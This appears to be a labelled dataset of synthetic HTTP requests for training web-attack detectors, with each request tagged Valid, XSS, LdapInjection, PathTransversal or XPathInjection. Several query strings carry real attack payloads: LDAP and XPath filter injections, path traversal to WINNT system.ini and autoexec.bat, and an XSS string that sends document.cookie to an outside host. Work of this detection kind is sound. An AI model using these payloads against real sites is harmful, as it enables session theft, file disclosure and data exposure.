UA-Pixels: 279x7075
Via: 9.3 112.82.220.227
Transfer-Encoding: gzip
Upgrade: zZr/7.6, ri9ps3/0.6
Warning: 724 1.186.0.197:4 "pvtse" 
X-Forwarded-For: 140.234.18.98
X-Serial-Number: 2426894
----: -------------
~~~~~: ~~~~~~~~~~

null

End - Id: 9521
Start - Id: 38973
class: LdapInjection
GET /p1m4LsMeeX4PJr/V%u0ditd6C/yoowpsje6ee/wvuWLYwheredB5Iqg./Voihome7CT2g4Wd/1Rbb7dfT@/cRC0_i4rR-3BQ98HYw/WXL/0tLpestBntm/w2rftpta.asmx?potannelalXlss=79871&a9k4b6hleumegr=%29++%28+++%7C++%28displayName%3Dhad*%29+%28name++++%3D++had*+++%29%28mail%3Dhad*+++%29 HTTP/1.1
Host: www.0lhaahsoa0.gov:80
Connection: keep-alive
Accept: application/*, text/*, application/*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 39.110.44.223
Cookie: Zaktnhwa7gu=m~Ote~()inputLyIqj;nef2ihmo=li9;2rt8t=sehx)qieaet;el=0
Date: Thu, 22 Jan 09 21:51:31 GMT
If-Modified-Since: Sat, 24 Feb 07 06:14:28 GMT
If-Unmodified-Since: Mon, 24 Apr 06 14:56:07 CET
If-Match: "Whtl8p8BnQEz5VZBxEwZ"
If-None-Match: *
If-Range: Mon, 15 Jun 09 14:28:09 GMT
Max-Forwards: 01
Pragma: no-cache
Authorization: NTLM c2VzcGViZWRscmllaWdiZW1hZ2R6cmdpc2VrZHR3c25lbm5ucmFp
Range: 4-376,4029-
Referer: /Nnne/lBienes3/t1nfor/iftz/myqi3Ei.bin
User-Agent: y0ebs7eel (a2PsyjoKC; e2YavS; roFALu0Io-; rWW@nI)
UA-Pixels: 9003x7790
Via: dis/0.0 195.217.62.241
Upgrade: densbt/0.0, UOwo/3.9, ciyntc/3.0, tneod/0.5, rcsker/3.3
Warning: 766 49.121.60.89 "llesRTdeaun22" 

null

End - Id: 38973
Start - Id: 48040
class: XSS
GET /gnu5ussdehrd9iu2ehO/esvuEankm3/s.IWA4XQ7-QrMk/n-Qxf2G7wk/nsrp4iiSrtgrB.mdb?raestezTe=%3Cimg++dynsrc%3D++++%22++++javascript%3A+%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.la.com%2Fcgi-bin%2Fetndsi.cgi%27%2Bdocument.cookie%29%3B%5D+%22+%3E&lishnszigs=3eswci&snse=3553269&y0enjofaOttwa=ytbl5R8t8&utduie8m4=otc HTTP/1.1
Host: 83.38.43.164:5
Connection: 1ianas
Accept: */*;q=0.2
Accept-Charset: *;q=0.5
Accept-Encoding: deflate;q=0.0, deflate
Accept-Language: cd-trros3po, tiolFi-eean;q=0.2, dA-y, mio-hyOx;q=0.8
Cache-Control: d5teeT=nn
Client-ip: 57.224.52.157
Cookie: GPckW=9185736;uo7uetushcN=uscriptaxmlEaa+o5et;LVUestdinOx6K5=86;nenedwcino3= atqo
Cookie2: $Version="85"
Date: Thu, 07 Jul 05 23:15:33 CET
ETag: "0ylSt0lEOmXK8dtOiEj"
Expect: sntr=swesei6
From: uesois@ewrsoxtt.it
If-Modified-Since: Fri, 01 Jul 05 15:49:05 CET
If-Unmodified-Since: Mon, 12 Apr 04 07:01:40 GMT
If-Match: "L.-Y4av_4D01@iUUh"
If-None-Match: "FxMNT_fPkXuak5Nm8"
If-Range: Mon, 23 Mar 09 02:49:24 CET
Max-Forwards: 1469
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: NTLM aWV0Unpub3NwdGRuTHJ0dHd0b2RoZGl0TG1pOEhqbmhlaWhvbnc4c3R3cmk=
Authorization: NTLM MGJzZ2lqbWllcmVBeThudGVhZG93d2E5cmxpeXZtZW5lT3dzOG1jc2FhZXNy
Range: 8804-
Referer: http://www.rIhReVo.gov/3wwlsw/navn3/uAoenle/enlase/fsealuun.mspx
TE: gzip;q=0.3
Trailer: Accept-Charset
User-Agent: Mozilla/0.3 (Windows; U; Windows NT 8.5; Tw-we; rv:7.5.3) Gecko/37727878
UA-CPU: StrongARM
UA-Disp: 0372,351,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 960x8995
Via: zirf/4.5 www.1f6n.html, 5.4 51.103.65.244:75652, 6.3 www.tu1s.jpeg
Transfer-Encoding: gzip
Upgrade: odv/3.8, cye8/8.2
Warning: 931 43.142.35.211 "tUI3qeeCt" "Mon, 16 Feb 04 11:58:32 CET"
X-Forwarded-For: 188.45.251.30
X-Serial-Number: 698729021
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48040
Start - Id: 38749
class: LdapInjection
GET /ezI2la0y/Oftp2Y-htaccesco.t3PQ/b2iqLIYkzNWbjRUz4l-M.png?citfiT=478850&hsock_streamO56lib0aOJV_Y=66228390&82akcKD1_tr3=6&3pt=mHnPv_mCh&iebn2eerits=chz8pd62&htrnrec=272&cSQKCKcN=e4n&jicJPD.Q_AV=%29++%28+%7C+%28cn%3D*o+++%27brien*++%29%28mail%3D*o+%27brien*+%29++&wasuta=aXFlBdWmcUAG&rwanenao=2cH&roe=0o+pi5aehmth&eo=irDhj3XoZ&eLa3Ss=linkkoe-+tfvsjten%29%24+%5D%5Dr&58htrIde=48156460 HTTP/1.0
Host: 66.183.68.57:3915
Connection: ervkEi
Accept: text/plain;q=0.1
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 111.176.120.104
Cookie: s9orz8q7j2g= a;alaqRnornpt=vxi;;mbufneos2AnQlhj=16600;aSieiecizmex9i=?7de;lEtfrt5rzatas=ssystem]e;lmErbea8n34adnu=olBpvE
Cookie2: $Version="482"
Date: Sat, 17 Jun 06 02:52:09 UTC
ETag: "b2R@sMIXD.Z0eAZ@-tX"
Expect: 100-continue
From: Dddcd@u4uew8d4.be
If-Modified-Since: Mon, 26 Jan 04 13:56:13 GMT
If-Unmodified-Since: Sat, 30 Sep 06 09:38:24 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 06 Jan 04 16:28:32 UTC
Max-Forwards: 1554
MIME-Version: 5.3
Pragma: t='b'
Proxy-Authorization: Digest nc=d1acEBc7
Authorization: s5dai izdatts=otssshge
Range: 6-630560,55-36780
Referer: http://www.ihr6a.com/otrer7/s7eu2Aku.zip
TE: deflate;q=0.3
Trailer: Upgrade
User-Agent: Mozilla/8.5 (X11; U; Linux i586 9.3; Ut-eo; rv:9.3.7) Gecko/17397980
UA-CPU: MIPS
UA-Disp: 8384,101,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 479x813
Via: 4.2 182.81.145.83
Transfer-Encoding: gzip
Upgrade: dEii/5.0, tdxit/7.6, ieed/6.6, lZat/6.5, ogl/2.1
Warning: 623 118.59.242.63:0920 "rowFrsl" 
X-Forwarded-For: 205.210.81.15
X-Serial-Number: 91445747246733
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38749
Start - Id: 27960
class: Valid
GET /5esrte/PXH/abneeenhwrinHihpgc0/yIOp6drxuXa2N.Kf/e_3GIpm_eZ/eednf5aJtsugygyde/w_locationqmLGfgEMTk/oelftzehee3sdi4Iin/C3QJ3Wq-5UY/ehhjgnvhRrtAsn5va.mdb?oe=o_z&au=hnascaA&tjso5qceaa=819330&Eslj=395Vpry56&orns%uERP2=gf1hntneiwax&aonmani8emu=idgNPWTI&2nEnsoTzcahk=rsikhe&ecanWddtHe=0820067290&gpfnOtp=inelveerruRilB&t6ehSr=56193664&iO2oebsystemPKRD=445530&tiHOo=44121&ZDduPexacceptdxCD=eplt2s8O&isdejgi7xu9sxkj=1 HTTP/1.0
Host: www.s7tecxotse.biz
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: compress, identity, deflate
Accept-Language: *
Cache-Control: max-age=28845
Client-ip: 37.171.143.216
Cookie: 7ah7r6tteLruln=1;ohenne=lq7;zAo0eldH7nct=1469081460;inicn= ;xPua-IM=69
Cookie2: $Version="939"
Date: Sat, 10 Jan 09 20:38:59 UTC
ETag: W/"jWRYbhByYe@mkrqJi7Ad"
Expect: amepA=rrroE
From: aclt@ntyaoohns.cz
If-Modified-Since: Fri, 30 Apr 10 14:58:05 CET
If-Unmodified-Since: Fri, 26 Sep 08 10:49:51 CET
If-Match: "5utkp7@XkSg8e4tEwF"
If-None-Match: "AP_B3OANos.Ejdc"
If-Range: *
Max-Forwards: 87
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Basic YmljbTprYzlpNGVi
Authorization: NTLM dDBvYWllZnROa2loZW90aElvcmRlaW9zN2hudHlncHNTcGxpZWhpbm5hcg==
Range: 561-
Referer: /nEovsri.exe
TE: chunked;q=0.6,chunked,chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/7.1 (compatible; fmlleqin; Solaris; efrnrFcroc; ucsae; iaoiadlrh)
UA-CPU: Sparc
UA-Disp: 3259,242,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 223x2147
Via: 7.6 www.tqcushvf.jpeg, 4.1 155.213.50.62
Transfer-Encoding: deflate
Upgrade: ln4enn/2.8, tnt/8.9
Warning: 080 www.hoprAi5e.jpg "twoeeNifnnI" "Wed, 10 Jun 09 03:58:11 GMT"
X-Forwarded-For: 80.235.203.15
X-Serial-Number: 74914
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27960
Start - Id: 13727
class: Valid
GET /htpass7g/o0n/saia9s2BiInnnimRed/dhl28Xolm2VCQbi/nLXtHNu7caG-Iz7/b64/eo5woNmbhbpafuhcajrq/pztgnf9Fwhlnbpplpl/fneeeeSDertaistmen.htm?ul4nf=seenodeesr%3Fzosnlna&yrgeNtaweb=921709&H2rEde2f6n3n=ganph-&iIh6=t+stmpimsime&thiIaeseoii=601&oSE0wo=h%2BAqtet%24estdinrr2locationiatd4 HTTP/1.1
Host: 178.174.190.177:80
Connection: close
Accept: video/mpeg, audio/*
Accept-Charset: iso-2022-jp;q=0.2, windows-1250, x-mac-hebrew
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 239.103.98.206
Cookie: arsgh=213968;heLkmiixt2ppmi=h/o;Er7e=9753
Cookie2: $Version="95"
Date: Tue, 19 Sep 06 16:05:17 CET
ETag: W/"a_ZfpksVbF0IZ4QA"
Expect: R2ra
From: ep4c@gnrwie6l.biz
If-Modified-Since: Tue, 31 Jul 07 09:29:14 CET
If-Unmodified-Since: Sun, 01 Jan 06 03:48:40 GMT
If-Match: "caJKCc4O32oT7uwtS"
If-None-Match: "J.Uch77mFnoT2h3"
If-Range: Fri, 22 Apr 05 03:04:25 GMT
Max-Forwards: 488
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest uri=http://sliaCear.fr/xlh1/4tmg/t5e1.mp3
Authorization: Basic aHRiY251czpONmV0bGk=
Range: -05
Referer: http://ecnOeY2v.org/clrolxd/unoabo.gz
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/3.0 (Windows; U; Win98 0.9; hn-rv; rv:7.5.5) Gecko/47638125
UA-CPU: PowerPC
UA-Disp: 911,125,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 6985x6776
Via: 1.1 72.143.50.113
Transfer-Encoding: identity
Upgrade: l4tt/6.1, gtIh/6.6, nsetrs/8.9, h1ehro/2.2
Warning: 799 www.lntleEda.png "elhhrlui" "Wed, 06 May 09 15:39:09 GMT"
X-Forwarded-For: 170.219.207.191
X-Serial-Number: 1852790108043394492
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13727
Start - Id: 25342
class: Valid
GET /ubf4OZMttgj7IKPD/em9MgO_ZGL.1/3tUWAsJh8/hcuXr6E/9CYpsSb0S@5WuEI/eeIhzwsrmsP5n.bin?abszdiejmaet=859694&tsmsoNbfrtedri=sAW4PpfV%40 HTTP/1.0
Host: www.T15remgtle.net
Connection: keep-alive
Accept: audio/*;q=0.4, image/*, audio/basic;q=0.1
Accept-Charset: x-mac-korean;q=0.0, cp-936;q=0.5, windows-874;q=0.1, windows-1257
Accept-Encoding: *
Accept-Language: HoT1Ict2-igci;q=0.5
Cache-Control: max-age=2616
Client-ip: 46.134.105.226
Cookie: adwsoaniihnxas=[Nob9ugm];oavrt= allgesr>;eonelytu=ysen
Cookie2: $Version="5"
Date: Tue, 10 Aug 04 12:51:58 CET
ETag: W/"Lu@0SAFVopAC9ECD"
Expect: 100-continue
From: hait@1onahThh5t.net
If-Modified-Since: Tue, 15 Apr 08 04:54:04 GMT
If-Unmodified-Since: Fri, 04 Mar 05 22:57:56 CET
If-Match: "BNRSV8BoV.hRKhzXY"
If-None-Match: *
If-Range: Tue, 08 Nov 05 07:48:44 GMT
Max-Forwards: 2091
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.rn0rrh.it/uox5plt/dRe5wf1t/sEfn/doaoli7/aepASr.cfm
Authorization: Basic ZHdyZXpzOjc3ZGRvdGVp
Range: -5,9601-,-779
Referer: http://eygE.cz/e8toa/atpo.shtml
TE: gzip
Trailer: Connection
User-Agent: rjm0-XVq http://www.istrira.uk
UA-CPU: 68000
UA-Disp: 645,174,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 3370x895
Via: 0.0 77.113.241.143
Transfer-Encoding: gzip
Upgrade: ato/3.1
Warning: 507 www.m5ctauut.htm "aje7owrp58as" "Wed, 13 Jan 10 11:26:34 GMT"
X-Forwarded-For: 117.22.170.105
X-Serial-Number: 29493838100482691776
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25342
Start - Id: 16413
class: Valid
GET /LGk6sock_streamzqdXD/i0c9Oamcu.dll?ooort=ricihebhaetetoo&eas3asItI7t=bitametaped%2Bptv6rl&4nteruS=ccer&iieuasdl=snufeesv&qoX_q=eYD66AO&aor6mt0ini6aon=n-K6AMmc5i&rrsgesswd=67&eoridtg=l5HUE0V23qj HTTP/1.0
Host: 255.36.68.0
Connection: keep-alive
Accept: video/*;q=0.2, image/jpeg;q=0.4, text/xml;q=0.5
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: ac-7zgsemt;q=0.1, lnu-aelpto, l-remna5rA;q=0.2, m-neEIeg, nphx-eLod8
Cache-Control: only-if-cached
Client-ip: 81.220.56.31
Cookie: GeKe5n8g=strh;99dZx1RdivHK=soopeiwtOico\l~ilra;EMlrwuidrb=lgcseditgp5ia;etn=1394
Cookie2: $Version="92"
Date: Fri, 01 Sep 06 20:26:24 CET
ETag: W/"_smcwUlFm.TISm7S0F"
Expect: 100-continue
From: setosoE@eiteajn.be
If-Modified-Since: Sat, 12 Nov 05 17:45:33 CET
If-Unmodified-Since: Sun, 04 Oct 09 19:05:26 GMT
If-Match: "v1yudLbNIx@nYsD"
If-None-Match: "qf_dh8LunId_x0C"
If-Range: "I..N93QD2hKVG.rQ20"
Max-Forwards: 819
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: Digest uri=/isau/hiace.nsf
Authorization: NTLM bjh2am1haGx1ZWF2bm55bkNlaGlyaFRhYWZzaDNzU3VldTZIb054QWE=
Range: -1
Referer: http://www.tecao.org/ntsij/eThSo9ii/8ty3dea/Gtlee2cf.png
TE: deflate;q=0.6,deflate
Trailer: If-Range
User-Agent: vso7eS3nu/5.7.3.9.4
UA-CPU: MIPS
UA-Disp: 227,815,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 9846x663
Via: 6.0 www.i4iGw.shtml, 5.8 88.204.159.152:617, g8veet/7.3 79.180.223.67
Transfer-Encoding: deflate
Upgrade: f0v/2.9, s8dtN/9.2
Warning: 597 131.243.210.234:4 "dcab" 
X-Forwarded-For: 242.97.236.194
X-Serial-Number: 493178
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16413
Start - Id: 15553
class: Valid
GET /hmxdTptlP_orLIj.swf?teetAE=c&VrmetTtrddmn=4862154&oiRU8bth=aya8h%3Fg%29tn%2Fi&Rs=Snt&3I=evalCr+eu1mrohsH&sheilneettleL=13&ge=ruteharaatan&_K2LwBsPQaIP=pRmiebaaVhomre&ciwnctrEit=4&eQhe1me3eoe=93795470 HTTP/1.1
Host: 65.193.210.165
Connection: hdlhtah
Accept: image/*;q=0.0, text/xml;q=0.8, text/xml;q=0.5
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.4
Cache-Control: max-stale=245
Client-ip: 227.212.204.1
Cookie: Ttn=49724856
Cookie2: $Version="420"
Date: Tue, 29 Jun 04 19:00:48 CET
ETag: "Cqt5eE91-djhUSQE"
Expect: 100-continue
From: Ftobr@eibao.net
If-Modified-Since: Tue, 11 May 04 11:16:42 UTC
If-Unmodified-Since: Wed, 05 Dec 07 22:26:13 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 28
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Hsumxd sali8=ohirmDyt
Authorization: NTLM bndzMWh0dGV0RWVpRVNydDZoZm5oRWRuY3RoZm5uNTRpcnV3cW0=
Range: 1-622060
Referer: /ebvgie/Bbrr/o2edoyHa.asp
TE: trailers,gzip
Trailer: Host
User-Agent: Mozilla/2.5 (X11; U; Open BSD i586 6.0; ps-ir; rv:1.7.2) Gecko/29104660
UA-CPU: x86
UA-Disp: 8876,6331,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5730x198
Via: 4.6 www.vuuba3.css:9636, FTP/7.9 www.euhR.htm, 8.4 86.240.195.243:14045
Transfer-Encoding: identity
Upgrade: h9hg/8.9, rYa/8.2, ujhe/6.4
Warning: 995 www.oigsc.css "fWumtNl" "Sat, 03 Oct 09 14:38:14 UTC"
X-Forwarded-For: 144.153.36.75
X-Serial-Number: 4557726217620382027
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15553
Start - Id: 5826
class: Valid
POST /BaqsGxYw0N/sT7/ragHuaojl0jr5sae/2IgzamGR/cgYqOfvpFHBQa4rx/RA/NegorsctroNokadsoioy/man01sntcpoeait7us/etcVOfRU/oCEtMQUBTOo4oKja/3ox6Gx_4u/eXOTHJ.aspx? HTTP/1.1
Content-Length: 49
Content-Language: topc
Content-Encoding: gzip
Content-Location: /eabtmil/el9iam/acrjkdo/ttSor/avsgn.conf
Content-MD5: U29ubXNSc3NscHRvZWhucg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 22 Oct 09 03:09:33 CET
Last-Modified: Thu, 22 Apr 04 03:27:05 UTC
Host: 12.232.244.58:463
Connection: 1hrerr7
Accept: application/*
Accept-Charset: utf-7
Accept-Encoding: 
Accept-Language: nvo-9t
Cache-Control: min-fresh=77
Client-ip: 109.157.141.38
Cookie: 4fEe=di2c4;alonqyshmkni=23;sQt3Tl7i=mcsgtImcxzri1tnnla
Cookie2: $Version="05"
Date: Mon, 21 Mar 05 15:51:25 CET
ETag: "PtKseiqlAztH7Rsq"
Expect: De4wfa
From: uidosta@cHrc6eaEh.fr
If-Modified-Since: Mon, 28 Feb 05 24:34:24 CET
If-Unmodified-Since: Wed, 15 Oct 08 23:48:33 GMT
If-Match: "ClSKCmduN@bpGgQtZk"
If-None-Match: *
If-Range: Tue, 05 Oct 04 08:17:13 UTC
Max-Forwards: 9766
MIME-Version: 3.8
Pragma: w=u2ajsiiw
Proxy-Authorization: NTLM dHdzcGVzcnZudGhiTmhlbXRkaGZkZXJvOXBrMGhjZXN1MmFyaHRubm8=
Authorization: Basic YWVlTjpldHA4Y2lt
Range: 8139-781351,-939422,275351-
Referer: http://nw8o.gov/eepns/nkopho/mhenrs7/hamnBne/dayiidi.jsp
TE: chunked,deflate;q=0.1,trailers
Trailer: Accept
User-Agent: tdordeidpb
UA-CPU: MIPS
UA-Disp: 1618,105,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 1021x7299
Via: FTP/2.4 109.49.117.200, FTP/6.2 49.119.77.181, LnyFe/7.5 14.44.126.39
Transfer-Encoding: deflate
Upgrade: rES/6.3
Warning: 755 www.nlkObec.css "1rjdirwgsHi" 
X-Forwarded-For: 238.36.196.14
X-Serial-Number: 8692230651
----: -------------
~~~~~: ~~~~~~~~~~~~~~~

o7aduht=1608&7ft=j?t7mgroup byt?H+passthrua

End - Id: 5826
Start - Id: 45653
class: PathTransversal
GET /noEettWusmruwvie/pL6sEGTwhg@vEeQ_CFl1/wQk/mlahfe4agzdczid/noho1udnno/f_Fr6dUK2y24.bin?hfkoEnal=41015&PlibzeG_b@6U=tET&upua7=mgtdL85a7xvleaidon&iaeit8ojtr=..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&d5qfiepykp=45&qUrmpY7Yl@h=479846&tITTaj=86&R9scriptLsGacceptA-=u5HgO&lAYpwgetrmYrz1=lohao4yn8update%3FEC HTTP/1.0
Host: www.w3crso.gov
Connection: keep-alive
Accept: video/*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: hhpyesn-rtceeer, oeetre2-fieta;q=0.5, t8Aa9g-sanwtms;q=0.1, sLnJm-5Ziaera
Cache-Control: max-age=957
Client-ip: 49.59.138.232
Cookie: eohed=ccmw<wat)es;vbnd_d@=a4rrticwf;testvRu3o=hWsxskt log;style60X4IkH=39902644
Cookie2: $Version="7"
Date: Thu, 14 May 09 04:29:16 GMT
ETag: "@9jfyx5Jsp9gY1D-"
Expect: 100-continue
From: waaAi@m8ebbshnen.org
If-Modified-Since: Wed, 03 Mar 04 19:06:46 GMT
If-Unmodified-Since: Wed, 10 Mar 10 22:57:48 CET
If-Match: *
If-None-Match: "CZjwIEyfouvKjLHbh"
If-Range: "y_@U.CcJySwlaWY9elPS"
Max-Forwards: 08
MIME-Version: 6.6
Pragma: td=acseH4
Proxy-Authorization: Digest realm
Authorization: Digest realm
Range: -32,-46611
Referer: http://www.AefdEt.gov/aetzs/lInEc/ds5ett.php
TE: trailers,chunked;q=0.0
Trailer: If-Modified-Since
User-Agent: Mozilla/0.7 (Windows; U; Windows NT 7.8; ne-ii; rv:3.5.8) Gecko/38068990
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 822x7787
Via: HTTP/9.2 www.taayee.shtml
Transfer-Encoding: npem; 4tirq1=vykbdsk
Upgrade: hnc/8.1
Warning: 878 36.126.187.244:5468 "Nwnmte1bhOIhe" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 4318148965798
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45653
Start - Id: 18724
class: Valid
GET /behl3frmi.css?2zbepat=2562&rneeAne=a&Dwwherej=8567012&tdgeEdo=2l+ HTTP/1.0
Host: 217.75.193.87
Connection: keep-alive
Accept: image/gif;q=0.1, video/quicktime, application/*;q=0.4
Accept-Charset: cp-936;q=0.5, windows-1255, windows-1254;q=0.4
Accept-Encoding: compress, gzip, compress;q=0.4
Accept-Language: oFu6ehts-oe1aoyn, v5ofbhi-s;q=0.7, cszeri-m7;q=0.5
Cache-Control: no-cache
Client-ip: 151.170.233.194
Cookie: ifdega= elot'il5+ pnupdateexecarrwgeti
Cookie2: $Version="3"
Date: Sun, 28 Feb 10 19:04:49 CET
ETag: W/"zvnk41a5Tn4k1k8ZK"
Expect: 100-continue
From: s9urn@T3rE4ome.com
If-Modified-Since: Thu, 23 Nov 06 22:50:54 UTC
If-Unmodified-Since: Mon, 04 Dec 06 09:23:11 GMT
If-Match: "CBPjkG6bg4zeBUY"
If-None-Match: "JiCYCKF6UXvE82YJGL5"
If-Range: *
Max-Forwards: 3099
MIME-Version: 0.0
Pragma: 3eSael=t08jm
Proxy-Authorization: Basic bW5udHphbTpSUmFqaQ==
Authorization: Digest nonce
Range: -0
Referer: /ro9ge/nmto5/ulhd9rO/grcse/ouodm.sh
TE: deflate;q=0.7
Trailer: If-None-Match
User-Agent: iel8x (7jZdkGSM5@; ekTG-QuDQ)
UA-CPU: MIPS
UA-Disp: 646,604,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4616x9503
Via: FTP/2.7 www.eesntr.html, 6.7 181.247.220.227, gEwTce/9.1 252.3.208.226
Transfer-Encoding: gzip
Upgrade: ayiai/8.8, ryiyaS/1.2
Warning: 464 209.65.87.36:429 "aor5ldpxtaehio3" 
X-Forwarded-For: 225.250.72.17
X-Serial-Number: 317895
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18724
Start - Id: 48846
class: XPathInjection
GET /io4thtltwtrstasT/fmfwbaTFR/FN.dll?lathrb=09&r0tm13to=911581&e1i=719074&jkz2=992948&1itlon=Aen&kmee9eotfO=adnoCnm&nnmelu=p9a&gansu=os&erHtdisotais0c=5260+++++or++++1%3C++r%2Fyn%2Fef%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D2%5D+or++8%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27 HTTP/1.0
Host: 214.250.242.205
Connection: close
Accept: */*
Accept-Charset: windows-874;q=0.2, euc-jp;q=0.9, windows-1254, iso-2022-kr, windows-1250;q=0.4
Accept-Encoding: compress;q=0.3, identity
Accept-Language: ael-sstb, ae-t277npj
Cache-Control: only-if-cached
Client-ip: 45.241.92.24
Cookie: ds=154691665;argtekrereru4=lpassthru=r2soesooe
Cookie2: $Version="96"
Date: Sat, 28 Jan 06 04:37:35 GMT
ETag: W/".PNa1BMBgDXCsul"
Expect: mOul=adnoax
From: w2h3rar@tkko9pi.org
If-Modified-Since: Tue, 15 Nov 05 08:11:53 UTC
If-Unmodified-Since: Sun, 15 Mar 09 04:57:12 UTC
If-Match: *
If-None-Match: "DNeZu5FY_YBBYv1RlbWj"
If-Range: *
Max-Forwards: 1440
MIME-Version: 6.2
Pragma: yt28lanr='yeugo'
Proxy-Authorization: Digest nc=412BEE2D
Authorization: NTLM cHhyZWN1dXNzdHJwb3RIMmFhSHd0cnRvZGFlZ0wzOThU
Range: 5-03627
Referer: http://oheog.fr/TRneCtei/I9tac/rfEemb.jsp
TE: gzip;q=0.8
Trailer: Trailer
User-Agent: Mozilla/5.5 (Windows; U; Win 9x 2.4; r5-or; rv:5.0.0) Gecko/48736974
UA-CPU: StrongARM
UA-Disp: 184,1119,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 412x876
Via: 2.6 27.111.237.6
Transfer-Encoding: deflate
Upgrade: qdiue/5.0
Warning: 266 252.104.26.149 "9bdidtHc" "Thu, 01 Nov 07 22:00:30 GMT"
X-Forwarded-For: 239.247.179.124
X-Serial-Number: 177199337529573688
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48846
Start - Id: 45748
class: PathTransversal
GET /jFAXLyO_@znCc4vLae/P9Mt7Yk/l0tt/ovs/NFVX4y/rn0lfehogiahsrtvdTs/snblthnhu8yr/kk/pxO.cfm?cEewotecne=7hetlMco3g&ahe7aod=22871&UrK55yQE=it&gahscesY=..%2F..%2F..%2F..%2F..%2F..%2FWINNT%2Fautoexec.bat&zntvhouhpeNPln=3sageeghsyEn&cs=4987424&@rrcp7g7Fe=r%3D&rhep39xsSses7a=43829&dqouinaoptekp=6104888&aat=n+wenwnccd%2Fhtey&gdaq7eiqFie=tow%2F HTTP/1.0
Host: 152.171.30.93:80
Connection: keep-alive
Accept: text/*;q=0.5, image/*;q=0.1, text/html;q=0.5
Accept-Charset: *
Accept-Encoding: gzip, deflate;q=0.2, compress, gzip
Accept-Language: *
Cache-Control: max-stale=4
Client-ip: 9.140.249.36
Cookie: tfWrecg=59;nROtxwrsmsqae=tdL;oywl=Ota;dew=die+
Cookie2: $Version="34"
Date: Tue, 31 Jan 06 05:48:35 CET
ETag: "@sm4d6_EmJB2BlXXqg7"
Expect: 100-continue
From: eyebc4et@nriRuu.de
If-Modified-Since: Thu, 12 Jan 06 10:46:25 CET
If-Unmodified-Since: Wed, 18 Jan 06 21:18:40 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 19 Dec 06 15:46:04 CET
Max-Forwards: 5868
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: Digest uri=/beS0.doc
Authorization: Basic OTBpRXgzbjphOWZUbmE=
Range: -500252,934-3694
Referer: /q2Eiohe/vwzgieie.png
TE: chunked,gzip;q=0.8,trailers
Trailer: If-None-Match
User-Agent: baleweean9nCseesds
UA-CPU: StrongARM
UA-Disp: 0244,7553,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 337x559
Via: saehs/0.0 www.fcaW2ptt.shtml:909
Transfer-Encoding: 3Epmo
Upgrade: e5r/8.9, sadhn/5.0, mdrxl/0.0, i4auie/7.0
Warning: 665 www.fiYe23m4.htm:79508 "hman" "Fri, 20 Oct 06 22:19:29 UTC"
X-Forwarded-For: 187.241.210.252
X-Serial-Number: 82558
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45748
Start - Id: 47551
class: XSS
